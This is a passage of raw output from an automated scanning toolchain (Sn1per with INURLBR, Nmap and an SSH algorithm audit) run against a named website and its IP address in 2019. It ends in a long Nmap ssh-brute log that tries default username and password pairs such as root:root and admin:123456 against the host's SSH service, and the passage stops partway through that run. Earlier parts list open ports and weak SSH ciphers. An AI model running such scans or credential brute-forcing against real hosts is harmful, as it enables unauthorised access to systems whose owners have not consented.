16974 _[ - ]::--------------------------------------------------------------------------------------------------------------
16975|_[ + ] [ 73 / 100 ]-[00:28:12] [ - ]
16976|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=out&u=39&go=1 ]
16977|_[ + ] Exploit::
16978|_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16979|_[ + ] More details:: / - / , ISP:
16980|_[ + ] Found:: UNIDENTIFIED
16981
16982 _[ - ]::--------------------------------------------------------------------------------------------------------------
16983|_[ + ] [ 74 / 100 ]-[00:28:13] [ - ]
16984|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=57&all_reviews=1 ]
16985|_[ + ] Exploit::
16986|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16987|_[ + ] More details:: / - / , ISP:
16988|_[ + ] Found:: UNIDENTIFIED
16989
16990 _[ - ]::--------------------------------------------------------------------------------------------------------------
16991|_[ + ] [ 75 / 100 ]-[00:28:14] [ - ]
16992|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=104&all_reviews=1 ]
16993|_[ + ] Exploit::
16994|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16995|_[ + ] More details:: / - / , ISP:
16996|_[ + ] Found:: UNIDENTIFIED
16997
16998 _[ - ]::--------------------------------------------------------------------------------------------------------------
16999|_[ + ] [ 76 / 100 ]-[00:28:15] [ - ]
17000|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=25&all_reviews=1 ]
17001|_[ + ] Exploit::
17002|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17003|_[ + ] More details:: / - / , ISP:
17004|_[ + ] Found:: UNIDENTIFIED
17005
17006 _[ - ]::--------------------------------------------------------------------------------------------------------------
17007|_[ + ] [ 77 / 100 ]-[00:28:16] [ - ]
17008|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=23&all_reviews=1 ]
17009|_[ + ] Exploit::
17010|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17011|_[ + ] More details:: / - / , ISP:
17012|_[ + ] Found:: UNIDENTIFIED
17013
17014 _[ - ]::--------------------------------------------------------------------------------------------------------------
17015|_[ + ] [ 78 / 100 ]-[00:28:17] [ - ]
17016|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=8&all_reviews=1 ]
17017|_[ + ] Exploit::
17018|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17019|_[ + ] More details:: / - / , ISP:
17020|_[ + ] Found:: UNIDENTIFIED
17021
17022 _[ - ]::--------------------------------------------------------------------------------------------------------------
17023|_[ + ] [ 79 / 100 ]-[00:28:17] [ - ]
17024|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=1&all_reviews=1 ]
17025|_[ + ] Exploit::
17026|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17027|_[ + ] More details:: / - / , ISP:
17028|_[ + ] Found:: UNIDENTIFIED
17029
17030 _[ - ]::--------------------------------------------------------------------------------------------------------------
17031|_[ + ] [ 80 / 100 ]-[00:28:18] [ - ]
17032|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=43&all_reviews=1 ]
17033|_[ + ] Exploit::
17034|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17035|_[ + ] More details:: / - / , ISP:
17036|_[ + ] Found:: UNIDENTIFIED
17037
17038 _[ - ]::--------------------------------------------------------------------------------------------------------------
17039|_[ + ] [ 81 / 100 ]-[00:28:19] [ - ]
17040|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=47&all_reviews=1 ]
17041|_[ + ] Exploit::
17042|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17043|_[ + ] More details:: / - / , ISP:
17044|_[ + ] Found:: UNIDENTIFIED
17045
17046 _[ - ]::--------------------------------------------------------------------------------------------------------------
17047|_[ + ] [ 82 / 100 ]-[00:28:19] [ - ]
17048|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=out&u=93&go=1 ]
17049|_[ + ] Exploit::
17050|_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17051|_[ + ] More details:: / - / , ISP:
17052|_[ + ] Found:: UNIDENTIFIED
17053
17054 _[ - ]::--------------------------------------------------------------------------------------------------------------
17055|_[ + ] [ 83 / 100 ]-[00:28:20] [ - ]
17056|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=91&all_reviews=1 ]
17057|_[ + ] Exploit::
17058|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17059|_[ + ] More details:: / - / , ISP:
17060|_[ + ] Found:: UNIDENTIFIED
17061
17062 _[ - ]::--------------------------------------------------------------------------------------------------------------
17063|_[ + ] [ 84 / 100 ]-[00:28:21] [ - ]
17064|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=93&all_reviews=1 ]
17065|_[ + ] Exploit::
17066|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17067|_[ + ] More details:: / - / , ISP:
17068|_[ + ] Found:: UNIDENTIFIED
17069
17070 _[ - ]::--------------------------------------------------------------------------------------------------------------
17071|_[ + ] [ 85 / 100 ]-[00:28:22] [ - ]
17072|_[ + ] Target:: [ https://www.ygmt.info/top/index.php?a=stats&u=99&all_reviews=1 ]
17073|_[ + ] Exploit::
17074|_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:443
17075|_[ + ] More details:: / - / , ISP:
17076|_[ + ] Found:: UNIDENTIFIED
17077
17078 _[ - ]::--------------------------------------------------------------------------------------------------------------
17079|_[ + ] [ 86 / 100 ]-[00:28:23] [ - ]
17080|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=66&all_reviews=1 ]
17081|_[ + ] Exploit::
17082|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17083|_[ + ] More details:: / - / , ISP:
17084|_[ + ] Found:: UNIDENTIFIED
17085
17086 _[ - ]::--------------------------------------------------------------------------------------------------------------
17087|_[ + ] [ 87 / 100 ]-[00:28:23] [ - ]
17088|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=37&all_reviews=1 ]
17089|_[ + ] Exploit::
17090|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17091|_[ + ] More details:: / - / , ISP:
17092|_[ + ] Found:: UNIDENTIFIED
17093
17094 _[ - ]::--------------------------------------------------------------------------------------------------------------
17095|_[ + ] [ 88 / 100 ]-[00:28:24] [ - ]
17096|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=19&all_reviews=1 ]
17097|_[ + ] Exploit::
17098|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17099|_[ + ] More details:: / - / , ISP:
17100|_[ + ] Found:: UNIDENTIFIED
17101
17102 _[ - ]::--------------------------------------------------------------------------------------------------------------
17103|_[ + ] [ 89 / 100 ]-[00:28:25] [ - ]
17104|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=39&all_reviews=1 ]
17105|_[ + ] Exploit::
17106|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17107|_[ + ] More details:: / - / , ISP:
17108|_[ + ] Found:: UNIDENTIFIED
17109
17110 _[ - ]::--------------------------------------------------------------------------------------------------------------
17111|_[ + ] [ 90 / 100 ]-[00:28:26] [ - ]
17112|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=30&all_reviews=1 ]
17113|_[ + ] Exploit::
17114|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17115|_[ + ] More details:: / - / , ISP:
17116|_[ + ] Found:: UNIDENTIFIED
17117
17118 _[ - ]::--------------------------------------------------------------------------------------------------------------
17119|_[ + ] [ 91 / 100 ]-[00:28:26] [ - ]
17120|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=33&all_reviews=1 ]
17121|_[ + ] Exploit::
17122|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17123|_[ + ] More details:: / - / , ISP:
17124|_[ + ] Found:: UNIDENTIFIED
17125
17126 _[ - ]::--------------------------------------------------------------------------------------------------------------
17127|_[ + ] [ 92 / 100 ]-[00:28:27] [ - ]
17128|_[ + ] Target:: [ http://www.ygmt.info/top/index.php?a=stats&u=44&all_reviews=1 ]
17129|_[ + ] Exploit::
17130|_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17131|_[ + ] More details:: / - / , ISP:
17132|_[ + ] Found:: UNIDENTIFIED
17133
17134 _[ - ]::--------------------------------------------------------------------------------------------------------------
17135|_[ + ] [ 93 / 100 ]-[00:28:28] [ - ]
17136|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=14&all_reviews=1 ]
17137|_[ + ] Exploit::
17138|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17139|_[ + ] More details:: / - / , ISP:
17140|_[ + ] Found:: UNIDENTIFIED
17141
17142 _[ - ]::--------------------------------------------------------------------------------------------------------------
17143|_[ + ] [ 94 / 100 ]-[00:28:29] [ - ]
17144|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=59&all_reviews=1 ]
17145|_[ + ] Exploit::
17146|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17147|_[ + ] More details:: / - / , ISP:
17148|_[ + ] Found:: UNIDENTIFIED
17149
17150 _[ - ]::--------------------------------------------------------------------------------------------------------------
17151|_[ + ] [ 95 / 100 ]-[00:28:30] [ - ]
17152|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=42&all_reviews=1 ]
17153|_[ + ] Exploit::
17154|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17155|_[ + ] More details:: / - / , ISP:
17156|_[ + ] Found:: UNIDENTIFIED
17157
17158 _[ - ]::--------------------------------------------------------------------------------------------------------------
17159|_[ + ] [ 96 / 100 ]-[00:28:31] [ - ]
17160|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=61&all_reviews=1 ]
17161|_[ + ] Exploit::
17162|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17163|_[ + ] More details:: / - / , ISP:
17164|_[ + ] Found:: UNIDENTIFIED
17165
17166 _[ - ]::--------------------------------------------------------------------------------------------------------------
17167|_[ + ] [ 97 / 100 ]-[00:28:32] [ - ]
17168|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=20&all_reviews=1 ]
17169|_[ + ] Exploit::
17170|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17171|_[ + ] More details:: / - / , ISP:
17172|_[ + ] Found:: UNIDENTIFIED
17173
17174 _[ - ]::--------------------------------------------------------------------------------------------------------------
17175|_[ + ] [ 98 / 100 ]-[00:28:32] [ - ]
17176|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=15&all_reviews=1 ]
17177|_[ + ] Exploit::
17178|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17179|_[ + ] More details:: / - / , ISP:
17180|_[ + ] Found:: UNIDENTIFIED
17181
17182 _[ - ]::--------------------------------------------------------------------------------------------------------------
17183|_[ + ] [ 99 / 100 ]-[00:28:33] [ - ]
17184|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=75&all_reviews=1 ]
17185|_[ + ] Exploit::
17186|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
17187|_[ + ] More details:: / - / , ISP:
17188|_[ + ] Found:: UNIDENTIFIED
17189
17190[ INFO ] [ Shutting down ]
17191[ INFO ] [ End of process INURLBR at [06-10-2019 00:28:33]
17192[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 5 ]
17193[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.ygmt.info/output/inurlbr-www.ygmt.info ]
17194|_________________________________________________________________________________________
17195http://www.ygmt.info/top50/index.php?a=stats&u=107
17196http://www.ygmt.info/top50/index.php?a=stats&u=83
17197http://www.ygmt.info/top50/index.php?a=stats&u=34
17198http://www.ygmt.info/top50/index.php?a=stats&u=56
17199http://www.ygmt.info/top50/index.php?a=stats&u=28
17200
17201\_________________________________________________________________________________________/
17202#######################################################################################################################################
17203Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-05 23:49 EDT
17204Nmap scan report for latina.petite.guru (185.82.200.52)
17205Host is up (0.12s latency).
17206Not shown: 479 closed ports
17207PORT STATE SERVICE
1720822/tcp open ssh
1720980/tcp open http
17210443/tcp open https
1721110000/tcp open snet-sensor-mgmt
17212
17213Nmap done: 1 IP address (1 host up) scanned in 1.86 seconds
17214######################################################################################################################################
17215# general
17216(gen) banner: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u8
17217(gen) software: OpenSSH 6.7p1
17218(gen) compatibility: OpenSSH 6.5-6.9, Dropbear SSH 2013.62+
17219(gen) compression: enabled (zlib@openssh.com)
17220
17221# key exchange algorithms
17222(kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
17223(kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
17224 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
17225(kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
17226 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
17227(kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
17228 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
17229(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
17230 `- [info] available since OpenSSH 4.4
17231(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
17232 `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
17233
17234# host-key algorithms
17235(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
17236(key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
17237 `- [warn] using small 1024-bit modulus
17238 `- [warn] using weak random number generator could reveal the key
17239 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
17240(key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
17241 `- [warn] using weak random number generator could reveal the key
17242 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
17243(key) ssh-ed25519 -- [info] available since OpenSSH 6.5
17244
17245# encryption algorithms (ciphers)
17246(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
17247(enc) aes192-ctr -- [info] available since OpenSSH 3.7
17248(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
17249(enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
17250(enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
17251(enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
17252 `- [info] default cipher since OpenSSH 6.9.
17253
17254# message authentication code algorithms
17255(mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
17256 `- [info] available since OpenSSH 6.2
17257(mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
17258(mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
17259(mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
17260(mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
17261 `- [info] available since OpenSSH 6.2
17262(mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
17263 `- [warn] using small 64-bit tag size
17264 `- [info] available since OpenSSH 4.7
17265(mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
17266 `- [info] available since OpenSSH 6.2
17267(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
17268 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
17269(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
17270 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
17271(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
17272 `- [warn] using weak hashing algorithm
17273 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
17274
17275# algorithm recommendations (for OpenSSH 6.7)
17276(rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
17277(rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
17278(rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
17279(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
17280(rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
17281(rec) -ssh-dss -- key algorithm to remove
17282(rec) -hmac-sha2-512 -- mac algorithm to remove
17283(rec) -umac-128@openssh.com -- mac algorithm to remove
17284(rec) -hmac-sha2-256 -- mac algorithm to remove
17285(rec) -umac-64@openssh.com -- mac algorithm to remove
17286(rec) -hmac-sha1 -- mac algorithm to remove
17287(rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
17288(rec) -umac-64-etm@openssh.com -- mac algorithm to remove
17289#######################################################################################################################################
17290Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-05 23:50 EDT
17291NSE: [ssh-run] Failed to specify credentials and command to run.
17292NSE: [ssh-brute] Trying username/password pair: root:root
17293NSE: [ssh-brute] Trying username/password pair: admin:admin
17294NSE: [ssh-brute] Trying username/password pair: administrator:administrator
17295NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
17296NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
17297NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
17298NSE: [ssh-brute] Trying username/password pair: guest:guest
17299NSE: [ssh-brute] Trying username/password pair: user:user
17300NSE: [ssh-brute] Trying username/password pair: web:web
17301NSE: [ssh-brute] Trying username/password pair: test:test
17302NSE: [ssh-brute] Trying username/password pair: root:
17303NSE: [ssh-brute] Trying username/password pair: admin:
17304NSE: [ssh-brute] Trying username/password pair: administrator:
17305NSE: [ssh-brute] Trying username/password pair: webadmin:
17306NSE: [ssh-brute] Trying username/password pair: sysadmin:
17307NSE: [ssh-brute] Trying username/password pair: netadmin:
17308NSE: [ssh-brute] Trying username/password pair: guest:
17309NSE: [ssh-brute] Trying username/password pair: user:
17310NSE: [ssh-brute] Trying username/password pair: web:
17311NSE: [ssh-brute] Trying username/password pair: test:
17312NSE: [ssh-brute] Trying username/password pair: root:123456
17313NSE: [ssh-brute] Trying username/password pair: admin:123456
17314NSE: [ssh-brute] Trying username/password pair: administrator:123456
17315NSE: [ssh-brute] Trying username/password pair: webadmin:123456
17316NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
17317NSE: [ssh-brute] Trying username/password pair: netadmin:123456
17318NSE: [ssh-brute] Trying username/password pair: guest:123456
17319NSE: [ssh-brute] Trying username/password pair: user:123456
17320NSE: [ssh-brute] Trying username/password pair: web:123456
17321NSE: [ssh-brute] Trying username/password pair: test:123456
17322NSE: [ssh-brute] Trying username/password pair: root:12345
17323NSE: [ssh-brute] Trying username/password pair: admin:12345
17324NSE: [ssh-brute] Trying username/password pair: administrator:12345
17325NSE: [ssh-brute] Trying username/password pair: webadmin:12345
17326NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
17327NSE: [ssh-brute] Trying username/password pair: netadmin:12345
17328NSE: [ssh-brute] Trying username/password pair: guest:12345
17329NSE: [ssh-brute] Trying username/password pair: user:12345
17330NSE: [ssh-brute] Trying username/password pair: web:12345
17331NSE: [ssh-brute] Trying username/password pair: test:12345
17332NSE: [ssh-brute] Trying username/password pair: root:123456789
17333NSE: [ssh-brute] Trying username/password pair: admin:123456789
17334NSE: [ssh-brute] Trying username/password pair: administrator:123456789
17335NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
17336NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
17337NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
17338NSE: [ssh-brute] Trying username/password pair: guest:123456789
17339NSE: [ssh-brute] Trying username/password pair: user:123456789
17340NSE: [ssh-brute] Trying username/password pair: web:123456789
17341NSE: [ssh-brute] Trying username/password pair: test:123456789
17342NSE: [ssh-brute] Trying username/password pair: root:password
17343NSE: [ssh-brute] Trying username/password pair: admin:password
17344NSE: [ssh-brute] Trying username/password pair: administrator:password
17345NSE: [ssh-brute] Trying username/password pair: webadmin:password
17346NSE: [ssh-brute] Trying username/password pair: sysadmin:password
17347NSE: [ssh-brute] Trying username/password pair: netadmin:password
17348NSE: [ssh-brute] Trying username/password pair: guest:password
17349NSE: [ssh-brute] Trying username/password pair: user:password
17350NSE: [ssh-brute] Trying username/password pair: web:password
17351NSE: [ssh-brute] Trying username/password pair: test:password
17352NSE: [ssh-brute] Trying username/password pair: root:iloveyou
17353NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
17354NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
17355NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
17356NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
17357NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
17358NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
17359NSE: [ssh-brute] Trying username/password pair: user:iloveyou
17360NSE: [ssh-brute] Trying username/password pair: web:iloveyou
17361NSE: [ssh-brute] Trying username/password pair: test:iloveyou
17362NSE: [ssh-brute] Trying username/password pair: root:princess
17363NSE: [ssh-brute] Trying username/password pair: admin:princess
17364NSE: [ssh-brute] Trying username/password pair: administrator:princess
17365NSE: [ssh-brute] Trying username/password pair: webadmin:princess
17366NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
17367NSE: [ssh-brute] Trying username/password pair: netadmin:princess
17368NSE: [ssh-brute] Trying username/password pair: guest:princess
17369NSE: [ssh-brute] Trying username/password pair: user:princess
17370NSE: [ssh-brute] Trying username/password pair: web:princess
17371NSE: [ssh-brute] Trying username/password pair: test:princess
17372NSE: [ssh-brute] Trying username/password pair: root:12345678
17373NSE: [ssh-brute] Trying username/password pair: admin:12345678
17374NSE: [ssh-brute] Trying username/password pair: administrator:12345678
17375NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
17376NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
17377NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
17378NSE: [ssh-brute] Trying username/password pair: guest:12345678
17379NSE: [ssh-brute] Trying username/password pair: user:12345678
17380NSE: [ssh-brute] Trying username/password pair: web:12345678
17381NSE: [ssh-brute] Trying username/password pair: test:12345678
17382NSE: [ssh-brute] Trying username/password pair: root:1234567
17383NSE: [ssh-brute] Trying username/password pair: admin:1234567
17384NSE: [ssh-brute] Trying username/password pair: administrator:1234567
17385NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
17386NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
17387NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
17388NSE: [ssh-brute] Trying username/password pair: guest:1234567
17389NSE: [ssh-brute] Trying username/password pair: user:1234567
17390NSE: [ssh-brute] Trying username/password pair: web:1234567
17391NSE: [ssh-brute] Trying username/password pair: test:1234567
17392NSE: [ssh-brute] Trying username/password pair: root:abc123
17393NSE: [ssh-brute] Trying username/password pair: admin:abc123
17394NSE: [ssh-brute] Trying username/password pair: administrator:abc123
17395NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
17396NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
17397NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
17398NSE: [ssh-brute] Trying username/password pair: guest:abc123
17399NSE: [ssh-brute] Trying username/password pair: user:abc123
17400NSE: [ssh-brute] Trying username/password pair: web:abc123
17401NSE: [ssh-brute] Trying username/password pair: test:abc123
17402NSE: [ssh-brute] Trying username/password pair: root:nicole
17403NSE: [ssh-brute] Trying username/password pair: admin:nicole
17404NSE: [ssh-brute] Trying username/password pair: administrator:nicole
17405NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
17406NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
17407NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
17408NSE: [ssh-brute] Trying username/password pair: guest:nicole
17409NSE: [ssh-brute] Trying username/password pair: user:nicole
17410NSE: [ssh-brute] Trying username/password pair: web:nicole
17411NSE: [ssh-brute] Trying username/password pair: test:nicole
17412NSE: [ssh-brute] Trying username/password pair: root:daniel
17413NSE: [ssh-brute] Trying username/password pair: admin:daniel
17414NSE: [ssh-brute] Trying username/password pair: administrator:daniel
17415NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
17416NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
17417NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
17418NSE: [ssh-brute] Trying username/password pair: guest:daniel
17419NSE: [ssh-brute] Trying username/password pair: user:daniel
17420NSE: [ssh-brute] Trying username/password pair: web:daniel
17421NSE: [ssh-brute] Trying username/password pair: test:daniel
17422NSE: [ssh-brute] Trying username/password pair: root:monkey
17423NSE: [ssh-brute] Trying username/password pair: admin:monkey
17424NSE: [ssh-brute] Trying username/password pair: administrator:monkey
17425NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
17426NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
17427NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
17428NSE: [ssh-brute] Trying username/password pair: guest:monkey
17429NSE: [ssh-brute] Trying username/password pair: user:monkey
17430NSE: [ssh-brute] Trying username/password pair: web:monkey
17431NSE: [ssh-brute] Trying username/password pair: test:monkey
17432NSE: [ssh-brute] Trying username/password pair: root:babygirl
17433NSE: [ssh-brute] Trying username/password pair: admin:babygirl
17434NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
17435NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
17436NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
17437NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
17438NSE: [ssh-brute] Trying username/password pair: guest:babygirl
17439NSE: [ssh-brute] Trying username/password pair: user:babygirl
17440NSE: [ssh-brute] Trying username/password pair: web:babygirl
17441NSE: [ssh-brute] Trying username/password pair: test:babygirl
17442NSE: [ssh-brute] Trying username/password pair: root:qwerty
17443NSE: [ssh-brute] Trying username/password pair: admin:qwerty
17444NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
17445NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
17446NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
17447NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
17448NSE: [ssh-brute] Trying username/password pair: guest:qwerty
17449NSE: [ssh-brute] Trying username/password pair: user:qwerty
17450NSE: [ssh-brute] Trying username/password pair: web:qwerty
17451NSE: [ssh-brute] Trying username/password pair: test:qwerty
17452NSE: [ssh-brute] Trying username/password pair: root:lovely
17453NSE: [ssh-brute] Trying username/password pair: admin:lovely
17454NSE: [ssh-brute] Trying username/password pair: administrator:lovely
17455NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
17456NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
17457NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
17458NSE: [ssh-brute] Trying username/password pair: guest:lovely
17459NSE: [ssh-brute] Trying username/password pair: user:lovely
17460NSE: [ssh-brute] Trying username/password pair: web:lovely
17461NSE: [ssh-brute] Trying username/password pair: test:lovely
17462NSE: [ssh-brute] Trying username/password pair: root:654321
17463NSE: [ssh-brute] Trying username/password pair: admin:654321
17464NSE: [ssh-brute] Trying username/password pair: administrator:654321
17465NSE: [ssh-brute] Trying username/password pair: webadmin:654321
17466NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
17467NSE: [ssh-brute] Trying username/password pair: netadmin:654321
17468NSE: [ssh-brute] Trying username/password pair: guest:654321
17469NSE: [ssh-brute] Trying username/password pair: user:654321
17470NSE: [ssh-brute] Trying username/password pair: web:654321
17471NSE: [ssh-brute] Trying username/password pair: test:654321
17472NSE: [ssh-brute] Trying username/password pair: root:michael
17473NSE: [ssh-brute] Trying username/password pair: admin:michael
17474NSE: [ssh-brute] Trying username/password pair: administrator:michael
17475NSE: [ssh-brute] Trying username/password pair: webadmin:michael
17476NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
17477NSE: [ssh-brute] Trying username/password pair: netadmin:michael
17478NSE: [ssh-brute] Trying username/password pair: guest:michael
